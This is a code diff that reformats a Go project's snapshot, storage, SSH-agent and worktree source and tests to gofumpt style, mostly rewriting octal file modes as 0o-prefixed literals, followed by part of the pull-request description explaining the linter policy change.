 		t.Fatalf("failed to create newfile.txt: %v", err)
 	}
 
@@ -117,13 +117,13 @@ func TestArchiveBackendRestoreTo(t *testing.T) {
 	restoreDir := t.TempDir()
 
 	// Create test files in workspace
-	if err := os.WriteFile(filepath.Join(workspaceDir, "app.go"), []byte("package app\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "app.go"), []byte("package app\n"), 0o644); err != nil {
 		t.Fatalf("failed to create app.go: %v", err)
 	}
-	if err := os.MkdirAll(filepath.Join(workspaceDir, "internal"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, "internal"), 0o755); err != nil {
 		t.Fatalf("failed to create internal dir: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "internal/core.go"), []byte("package internal\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "internal/core.go"), []byte("package internal\n"), 0o644); err != nil {
 		t.Fatalf("failed to create internal/core.go: %v", err)
 	}
 
@@ -178,32 +178,32 @@ func TestArchiveBackendGitignore(t *testing.T) {
 build/
 .env
 `
-	if err := os.WriteFile(filepath.Join(workspaceDir, ".gitignore"), []byte(gitignore), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, ".gitignore"), []byte(gitignore), 0o644); err != nil {
 		t.Fatalf("failed to create .gitignore: %v", err)
 	}
 
 	// Create files that should be included
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
 
 	// Create files/directories that should be excluded
-	if err := os.MkdirAll(filepath.Join(workspaceDir, "node_modules/pkg"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, "node_modules/pkg"), 0o755); err != nil {
 		t.Fatalf("failed to create node_modules: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "node_modules/pkg/index.js"), []byte("module.exports = {}\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "node_modules/pkg/index.js"), []byte("module.exports = {}\n"), 0o644); err != nil {
 		t.Fatalf("failed to create node_modules file: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "app.log"), []byte("log entry\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "app.log"), []byte("log entry\n"), 0o644); err != nil {
 		t.Fatalf("failed to create app.log: %v", err)
 	}
-	if err := os.MkdirAll(filepath.Join(workspaceDir, "build"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, "build"), 0o755); err != nil {
 		t.Fatalf("failed to create build dir: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "build/output.js"), []byte("compiled\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "build/output.js"), []byte("compiled\n"), 0o644); err != nil {
 		t.Fatalf("failed to create build/output.js: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, ".env"), []byte("SECRET=value\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, ".env"), []byte("SECRET=value\n"), 0o644); err != nil {
 		t.Fatalf("failed to create .env: %v", err)
 	}
 
@@ -250,16 +250,16 @@ func TestArchiveBackendAdditionalExcludes(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create test files
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
-	if err := os.MkdirAll(filepath.Join(workspaceDir, "vendor"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, "vendor"), 0o755); err != nil {
 		t.Fatalf("failed to create vendor dir: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "vendor/dep.go"), []byte("package vendor\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "vendor/dep.go"), []byte("package vendor\n"), 0o644); err != nil {
 		t.Fatalf("failed to create vendor/dep.go: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "debug.tmp"), []byte("temp data\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "debug.tmp"), []byte("temp data\n"), 0o644); err != nil {
 		t.Fatalf("failed to create debug.tmp: %v", err)
 	}
 
@@ -299,15 +299,15 @@ func TestArchiveBackendPreservesGitDirOnRestore(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create test files
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
 
 	// Create a fake .git directory (should NOT be archived, but should be preserved on restore)
-	if err := os.MkdirAll(filepath.Join(workspaceDir, ".git/objects"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, ".git/objects"), 0o755); err != nil {
 		t.Fatalf("failed to create .git: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, ".git/HEAD"), []byte("ref: refs/heads/main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, ".git/HEAD"), []byte("ref: refs/heads/main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create .git/HEAD: %v", err)
 	}
 
@@ -320,11 +320,11 @@ func TestArchiveBackendPreservesGitDirOnRestore(t *testing.T) {
 	}
 
 	// Modify workspace files
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main // changed\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main // changed\n"), 0o644); err != nil {
 		t.Fatalf("failed to modify main.go: %v", err)
 	}
 	// Also add a marker to .git to verify it's preserved
-	if err := os.WriteFile(filepath.Join(workspaceDir, ".git/marker"), []byte("keep me\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, ".git/marker"), []byte("keep me\n"), 0o644); err != nil {
 		t.Fatalf("failed to create .git/marker: %v", err)
 	}
 
@@ -400,7 +400,7 @@ func TestArchiveBackendSymlinks(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create a file and a symlink to it
-	if err := os.WriteFile(filepath.Join(workspaceDir, "target.txt"), []byte("target content\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "target.txt"), []byte("target content\n"), 0o644); err != nil {
 		t.Fatalf("failed to create target.txt: %v", err)
 	}
 	if err := os.Symlink("target.txt", filepath.Join(workspaceDir, "link.txt")); err != nil {
@@ -501,7 +501,7 @@ func TestArchiveBackendSymlinkPathTraversal(t *testing.T) {
 			// Try to restore it
 			backend := NewArchiveBackend(snapshotDir, ArchiveOptions{})
 			testRestoreDir := filepath.Join(restoreDir, tc.name)
-			if err := os.MkdirAll(testRestoreDir, 0755); err != nil {
+			if err := os.MkdirAll(testRestoreDir, 0o755); err != nil {
 				t.Fatalf("failed to create restore dir: %v", err)
 			}
 
@@ -543,7 +543,7 @@ func createMaliciousArchive(t *testing.T, archivePath, linkName, linkTarget stri
 	targetContent := []byte("target content")
 	targetHeader := &tar.Header{
 		Name: "target.txt",
-		Mode: 0644,
+		Mode: 0o644,
 		Size: int64(len(targetContent)),
 	}
 	if err := tw.WriteHeader(targetHeader); err != nil {
@@ -557,7 +557,7 @@ func createMaliciousArchive(t *testing.T, archivePath, linkName, linkTarget stri
 	if dir := filepath.Dir(linkName); dir != "." {
 		dirHeader := &tar.Header{
 			Name:     dir + "/",
-			Mode:     0755,
+			Mode:     0o755,
 			Typeflag: tar.TypeDir,
 		}
 		if err := tw.WriteHeader(dirHeader); err != nil {
@@ -569,7 +569,7 @@ func createMaliciousArchive(t *testing.T, archivePath, linkName, linkTarget stri
 	header := &tar.Header{
 		Name:     linkName,
 		Linkname: linkTarget,
-		Mode:     0777,
+		Mode:     0o777,
 		Typeflag: tar.TypeSymlink,
 	}
 	if err := tw.WriteHeader(header); err != nil {
@@ -583,7 +583,7 @@ func TestArchiveBackendListMultiple(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create a test file
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
 
@@ -631,13 +631,13 @@ func TestArchiveBackendFilePermissions(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create files with different permissions
-	if err := os.WriteFile(filepath.Join(workspaceDir, "script.sh"), []byte("#!/bin/bash\necho hello\n"), 0755); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "script.sh"), []byte("#!/bin/bash\necho hello\n"), 0o755); err != nil {
 		t.Fatalf("failed to create script.sh: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "data.txt"), []byte("data\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "data.txt"), []byte("data\n"), 0o644); err != nil {
 		t.Fatalf("failed to create data.txt: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "readonly.txt"), []byte("read only\n"), 0444); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "readonly.txt"), []byte("read only\n"), 0o444); err != nil {
 		t.Fatalf("failed to create readonly.txt: %v", err)
 	}
 
@@ -660,7 +660,7 @@ func TestArchiveBackendFilePermissions(t *testing.T) {
 	if err != nil {
 		t.Fatalf("failed to stat script.sh: %v", err)
 	}
-	if info.Mode().Perm()&0111 == 0 {
+	if info.Mode().Perm()&0o111 == 0 {
 		t.Errorf("script.sh should be executable, got mode %o", info.Mode().Perm())
 	}
 
@@ -668,7 +668,7 @@ func TestArchiveBackendFilePermissions(t *testing.T) {
 	if err != nil {
 		t.Fatalf("failed to stat data.txt: %v", err)
 	}
-	if info.Mode().Perm()&0111 != 0 {
+	if info.Mode().Perm()&0o111 != 0 {
 		t.Errorf("data.txt should not be executable, got mode %o", info.Mode().Perm())
 	}
 }
@@ -679,32 +679,32 @@ func TestArchiveBackendNestedGitignore(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create root .gitignore
-	if err := os.WriteFile(filepath.Join(workspaceDir, ".gitignore"), []byte("*.log\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, ".gitignore"), []byte("*.log\n"), 0o644); err != nil {
 		t.Fatalf("failed to create .gitignore: %v", err)
 	}
 
 	// Create subdirectory with its own .gitignore
-	if err := os.MkdirAll(filepath.Join(workspaceDir, "subdir"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, "subdir"), 0o755); err != nil {
 		t.Fatalf("failed to create subdir: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "subdir/.gitignore"), []byte("*.tmp\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "subdir/.gitignore"), []byte("*.tmp\n"), 0o644); err != nil {
 		t.Fatalf("failed to create subdir/.gitignore: %v", err)
 	}
 
 	// Create files
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "app.log"), []byte("log\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "app.log"), []byte("log\n"), 0o644); err != nil {
 		t.Fatalf("failed to create app.log: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "subdir/code.go"), []byte("package subdir\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "subdir/code.go"), []byte("package subdir\n"), 0o644); err != nil {
 		t.Fatalf("failed to create subdir/code.go: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "subdir/cache.tmp"), []byte("temp\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "subdir/cache.tmp"), []byte("temp\n"), 0o644); err != nil {
 		t.Fatalf("failed to create subdir/cache.tmp: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "subdir/debug.log"), []byte("debug\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "subdir/debug.log"), []byte("debug\n"), 0o644); err != nil {
 		t.Fatalf("failed to create subdir/debug.log: %v", err)
 	}
 
@@ -792,7 +792,7 @@ func TestArchiveBackendFileCountLimit(t *testing.T) {
 	for i := 0; i < testFileCount; i++ {
 		header := &tar.Header{
 			Name: "file" + string(rune('0'+i%10)) + ".txt",
-			Mode: 0644,
+			Mode: 0o644,
 			Size: 0,
 		}
 		if err := tw.WriteHeader(header); err != nil {
@@ -823,10 +823,10 @@ func TestArchiveBackendFileCountLimit(t *testing.T) {
 func mustWriteFile(t *testing.T, root, rel, content string) {
 	t.Helper()
 	path := filepath.Join(root, rel)
-	if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Dir(path), 0o755); err != nil {
 		t.Fatalf("mkdir for %s: %v", rel, err)
 	}
-	if err := os.WriteFile(path, []byte(content), 0644); err != nil {
+	if err := os.WriteFile(path, []byte(content), 0o644); err != nil {
 		t.Fatalf("write %s: %v", rel, err)
 	}
 }

--- a/internal/snapshot/engine.go
+++ b/internal/snapshot/engine.go
@@ -52,7 +52,7 @@ func NewEngine(workspace, snapshotDir string, opts EngineOptions) (*Engine, erro
 	}
 
 	// Ensure snapshot directory exists
-	if err := os.MkdirAll(snapshotDir, 0755); err != nil {
+	if err := os.MkdirAll(snapshotDir, 0o755); err != nil {
 		return nil, fmt.Errorf("create snapshot directory: %w", err)
 	}
 

--- a/internal/snapshot/engine_test.go
+++ b/internal/snapshot/engine_test.go
@@ -51,13 +51,13 @@ func TestEngineCreateAndRestore(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create test files in workspace
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
-	if err := os.MkdirAll(filepath.Join(workspaceDir, "pkg"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, "pkg"), 0o755); err != nil {
 		t.Fatalf("failed to create pkg dir: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "pkg/lib.go"), []byte("package pkg\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "pkg/lib.go"), []byte("package pkg\n"), 0o644); err != nil {
 		t.Fatalf("failed to create pkg/lib.go: %v", err)
 	}
 
@@ -96,10 +96,10 @@ func TestEngineCreateAndRestore(t *testing.T) {
 	}
 
 	// Modify workspace
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main // modified\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main // modified\n"), 0o644); err != nil {
 		t.Fatalf("failed to modify main.go: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "newfile.txt"), []byte("new content\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "newfile.txt"), []byte("new content\n"), 0o644); err != nil {
 		t.Fatalf("failed to create newfile.txt: %v", err)
 	}
 
@@ -139,7 +139,7 @@ func TestEngineRestoreTo(t *testing.T) {
 	restoreDir := t.TempDir()
 
 	// Create test files in workspace
-	if err := os.WriteFile(filepath.Join(workspaceDir, "app.go"), []byte("package app\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "app.go"), []byte("package app\n"), 0o644); err != nil {
 		t.Fatalf("failed to create app.go: %v", err)
 	}
 
@@ -187,7 +187,7 @@ func TestEngineList(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create a test file
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
 
@@ -243,7 +243,7 @@ func TestEngineGet(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create a test file
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
 
@@ -286,7 +286,7 @@ func TestEngineDelete(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create a test file
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
 
@@ -342,7 +342,7 @@ func TestEngineMetadataPersistence(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create a test file
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
 
@@ -389,23 +389,23 @@ func TestEngineGitignoreOption(t *testing.T) {
 	gitignore := `node_modules/
 *.log
 `
-	if err := os.WriteFile(filepath.Join(workspaceDir, ".gitignore"), []byte(gitignore), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, ".gitignore"), []byte(gitignore), 0o644); err != nil {
 		t.Fatalf("failed to create .gitignore: %v", err)
 	}
 
 	// Create files that should be included
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
 
 	// Create files that should be excluded
-	if err := os.MkdirAll(filepath.Join(workspaceDir, "node_modules/pkg"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, "node_modules/pkg"), 0o755); err != nil {
 		t.Fatalf("failed to create node_modules: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "node_modules/pkg/index.js"), []byte("module.exports = {}\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "node_modules/pkg/index.js"), []byte("module.exports = {}\n"), 0o644); err != nil {
 		t.Fatalf("failed to create node_modules file: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "app.log"), []byte("log entry\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "app.log"), []byte("log entry\n"), 0o644); err != nil {
 		t.Fatalf("failed to create app.log: %v", err)
 	}
 
@@ -449,13 +449,13 @@ func TestEngineAdditionalExcludes(t *testing.T) {
 	snapshotDir := t.TempDir()
 
 	// Create test files
-	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "main.go"), []byte("package main\n"), 0o644); err != nil {
 		t.Fatalf("failed to create main.go: %v", err)
 	}
-	if err := os.MkdirAll(filepath.Join(workspaceDir, "vendor"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(workspaceDir, "vendor"), 0o755); err != nil {
 		t.Fatalf("failed to create vendor dir: %v", err)
 	}
-	if err := os.WriteFile(filepath.Join(workspaceDir, "vendor/dep.go"), []byte("package vendor\n"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(workspaceDir, "vendor/dep.go"), []byte("package vendor\n"), 0o644); err != nil {
 		t.Fatalf("failed to create vendor/dep.go: %v", err)
 	}
 

--- a/internal/sshagent/server.go
+++ b/internal/sshagent/server.go
@@ -85,7 +85,7 @@ func (s *Server) startUnix() error {
 	// 1. The socket directory is per-run (~/.moat/sockets/<run-id>/)
 	// 2. The proxy enforces host-based key filtering
 	// 3. Only the specific container has the directory mounted
-	if err := os.Chmod(s.socketPath, 0666); err != nil {
+	if err := os.Chmod(s.socketPath, 0o666); err != nil {
 		listener.Close()
 		return fmt.Errorf("setting socket permissions: %w", err)
 	}

--- a/internal/sshagent/server_test.go
+++ b/internal/sshagent/server_test.go
@@ -76,7 +76,7 @@ func TestServerSocketPermissions(t *testing.T) {
 	// Socket should be owner read/write only (0600 or similar)
 	// Note: On some systems socket permissions may differ
 	mode := info.Mode().Perm()
-	if mode&0077 != 0 {
+	if mode&0o077 != 0 {
 		t.Logf("Socket permissions: %o (note: some systems allow different permissions)", mode)
 	}
 }
@@ -92,7 +92,7 @@ func TestServerRemovesExistingSocket(t *testing.T) {
 	socketPath := filepath.Join(dir, "a.sock")
 
 	// Create a stale socket file
-	if err := os.WriteFile(socketPath, []byte("stale"), 0600); err != nil {
+	if err := os.WriteFile(socketPath, []byte("stale"), 0o600); err != nil {
 		t.Fatalf("Creating stale file: %v", err)
 	}
 

--- a/internal/storage/storage.go
+++ b/internal/storage/storage.go
@@ -69,7 +69,7 @@ type RunStore struct {
 // It creates the run directory under baseDir if it doesn't exist.
 func NewRunStore(baseDir, runID string) (*RunStore, error) {
 	runDir := filepath.Join(baseDir, runID)
-	if err := os.MkdirAll(runDir, 0700); err != nil {
+	if err := os.MkdirAll(runDir, 0o700); err != nil {
 		return nil, err
 	}
 	return &RunStore{
@@ -104,7 +104,7 @@ func (s *RunStore) SaveMetadata(m Metadata) error {
 	if err != nil {
 		return err
 	}
-	return os.WriteFile(filepath.Join(s.dir, "metadata.json"), data, 0600)
+	return os.WriteFile(filepath.Join(s.dir, "metadata.json"), data, 0o600)
 }
 
 // LoadMetadata reads the metadata from metadata.json in the run directory.
@@ -216,7 +216,7 @@ func (s *RunStore) LogWriter() (*LogWriter, error) {
 	f, err := os.OpenFile(
 		filepath.Join(s.dir, "logs.jsonl"),
 		os.O_CREATE|os.O_WRONLY|os.O_APPEND,
-		0600,
+		0o600,
 	)
 	if err != nil {
 		return nil, fmt.Errorf("opening log file: %w", err)
@@ -230,7 +230,7 @@ func (s *RunStore) JoinLogWriter(index int) (*LogWriter, error) {
 	f, err := os.OpenFile(
 		filepath.Join(s.dir, fmt.Sprintf("logs.%d.jsonl", index)),
 		os.O_CREATE|os.O_WRONLY|os.O_APPEND,
-		0600,
+		0o600,
 	)
 	if err != nil {
 		return nil, fmt.Errorf("opening join log file: %w", err)
@@ -289,7 +289,7 @@ func (s *RunStore) WriteSpan(span Span) error {
 	f, err := os.OpenFile(
 		filepath.Join(s.dir, "traces.jsonl"),
 		os.O_CREATE|os.O_WRONLY|os.O_APPEND,
-		0600,
+		0o600,
 	)
 	if err != nil {
 		return fmt.Errorf("opening trace file: %w", err)
@@ -350,7 +350,7 @@ func (s *RunStore) WriteNetworkRequest(req NetworkRequest) error {
 	f, err := os.OpenFile(
 		filepath.Join(s.dir, "network.jsonl"),
 		os.O_CREATE|os.O_WRONLY|os.O_APPEND,
-		0600,
+		0o600,
 	)
 	if err != nil {
 		return fmt.Errorf("opening network file: %w", err)
@@ -380,7 +380,7 @@ func (s *RunStore) WriteSecretResolution(res SecretResolution) error {
 	f, err := os.OpenFile(
 		filepath.Join(s.dir, "secrets.jsonl"),
 		os.O_CREATE|os.O_WRONLY|os.O_APPEND,
-		0600,
+		0o600,
 	)
 	if err != nil {
 		return err
@@ -460,7 +460,7 @@ func (s *RunStore) WriteExecEvent(event ExecEvent) error {
 	f, err := os.OpenFile(
 		filepath.Join(s.dir, "exec.jsonl"),
 		os.O_CREATE|os.O_WRONLY|os.O_APPEND,
-		0600,
+		0o600,
 	)
 	if err != nil {
 		return fmt.Errorf("opening exec file: %w", err)
@@ -510,7 +510,7 @@ func (s *RunStore) ReadExecEvents() ([]ExecEvent, error) {
 
 // SaveDockerfile saves the Dockerfile used to build the container image.
 func (s *RunStore) SaveDockerfile(dockerfile string) error {
-	return os.WriteFile(filepath.Join(s.dir, "Dockerfile"), []byte(dockerfile), 0644)
+	return os.WriteFile(filepath.Join(s.dir, "Dockerfile"), []byte(dockerfile), 0o644)
 }
 
 // ReadDockerfile reads the Dockerfile from the run directory.

--- a/internal/storage/storage_test.go
+++ b/internal/storage/storage_test.go
@@ -677,7 +677,7 @@ func TestReadNetworkRequestsMalformed(t *testing.T) {
 	f, err := os.OpenFile(
 		filepath.Join(dir, "run_netmal1", "network.jsonl"),
 		os.O_WRONLY|os.O_APPEND,
-		0600,
+		0o600,
 	)
 	if err != nil {
 		t.Fatalf("OpenFile: %v", err)

--- a/internal/system/tempclean_test.go
+++ b/internal/system/tempclean_test.go
@@ -21,7 +21,7 @@ func TestFindOrphanedTempDirs(t *testing.T) {
 	legacyOldDir := filepath.Join(tmpDir, "agentops-aws-old")
 
 	for _, dir := range []string{oldDir, recentDir, claudeOldDir, legacyOldDir} {
-		if err := os.Mkdir(dir, 0755); err != nil {
+		if err := os.Mkdir(dir, 0o755); err != nil {
 			t.Fatal(err)
 		}
 	}
@@ -91,7 +91,7 @@ func TestCleanOrphanedTempDirs(t *testing.T) {
 	}
 
 	for _, dir := range testDirs {
-		if err := os.Mkdir(dir, 0755); err != nil {
+		if err := os.Mkdir(dir, 0o755); err != nil {
 			t.Fatal(err)
 		}
 		// Make them old
@@ -134,7 +134,7 @@ func TestCleanOrphanedTempDirs_SkipsRecentlyModified(t *testing.T) {
 
 	// Create a test directory
 	testDir := filepath.Join(tmpDir, "test-recent")
-	if err := os.Mkdir(testDir, 0755); err != nil {
+	if err := os.Mkdir(testDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
 
@@ -198,19 +198,19 @@ func TestDirSize(t *testing.T) {
 	tmpDir := t.TempDir()
 
 	// Create a directory with some files
-	if err := os.WriteFile(filepath.Join(tmpDir, "file1.txt"), []byte("hello"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(tmpDir, "file1.txt"), []byte("hello"), 0o644); err != nil {
 		t.Fatal(err)
 	}
-	if err := os.WriteFile(filepath.Join(tmpDir, "file2.txt"), []byte("world"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(tmpDir, "file2.txt"), []byte("world"), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
 	// Create a subdirectory with a file
 	subDir := filepath.Join(tmpDir, "subdir")
-	if err := os.Mkdir(subDir, 0755); err != nil {
+	if err := os.Mkdir(subDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
-	if err := os.WriteFile(filepath.Join(subDir, "file3.txt"), []byte("test"), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(subDir, "file3.txt"), []byte("test"), 0o644); err != nil {
 		t.Fatal(err)
 	}
 

--- a/internal/trace/format.go
+++ b/internal/trace/format.go
@@ -66,5 +66,5 @@ func (t *Trace) Save(path string) error {
 	if err != nil {
 		return err
 	}
-	return os.WriteFile(path, data, 0600)
+	return os.WriteFile(path, data, 0o600)
 }

--- a/internal/ui/ui.go
+++ b/internal/ui/ui.go
@@ -18,8 +18,10 @@ func SetWriter(w io.Writer) {
 
 // --- Color detection ---
 
-var stdoutColor = detectColor(os.Stdout)
-var stderrColor = detectColor(os.Stderr)
+var (
+	stdoutColor = detectColor(os.Stdout)
+	stderrColor = detectColor(os.Stderr)
+)
 
 func detectColor(f *os.File) bool {
 	if os.Getenv("NO_COLOR") != "" {

--- a/internal/worktree/repo_test.go
+++ b/internal/worktree/repo_test.go
@@ -237,7 +237,7 @@ func TestFindRepoRoot(t *testing.T) {
 	}
 
 	subDir := filepath.Join(tmpDir, "a", "b", "c")
-	if err := os.MkdirAll(subDir, 0755); err != nil {
+	if err := os.MkdirAll(subDir, 0o755); err != nil {
 		t.Fatal(err)
 	}
 

--- a/internal/worktree/worktree.go
+++ b/internal/worktree/worktree.go
@@ -61,7 +61,7 @@ func Resolve(repoRoot, repoID, branch, agentName string) (*Result, error) {
 	}
 
 	// Create parent directory
-	if err := os.MkdirAll(filepath.Dir(wtPath), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Dir(wtPath), 0o755); err != nil {
 		return nil, fmt.Errorf("creating worktree parent directory: %w", err)
 	}
 

--- a/internal/worktree/worktree_test.go
+++ b/internal/worktree/worktree_test.go
@@ -33,7 +33,7 @@ func initTestRepo(t *testing.T) string {
 	run("git", "init")
 	run("git", "remote", "add", "origin", "https://github.com/acme/myrepo.git")
 	readme := filepath.Join(tmpDir, "README.md")
-	os.WriteFile(readme, []byte("# test"), 0644)
+	os.WriteFile(readme, []byte("# test"), 0o644)
 	run("git", "add", ".")
 	run("git", "commit", "-m", "initial commit")
 


### PR DESCRIPTION
From the craftsmanship audit's tooling-floor move — uniform, stricter-than-gofmt formatting enforced at every layer (editor hook → lint → CI). Two commits for easy review: the **policy change** (4 files) and the **bulk reformat** (87 files, pure formatting).

## Policy (commit 1)
- **`.golangci.yml`**: configured formatter `gofmt` → `gofumpt` (stricter superset). `golangci-lint run` runs the formatters and fails on any unformatted file — verified it flags a violation and exits 1 — so the manual `gofmt -l` CI step is **removed as redundant**.
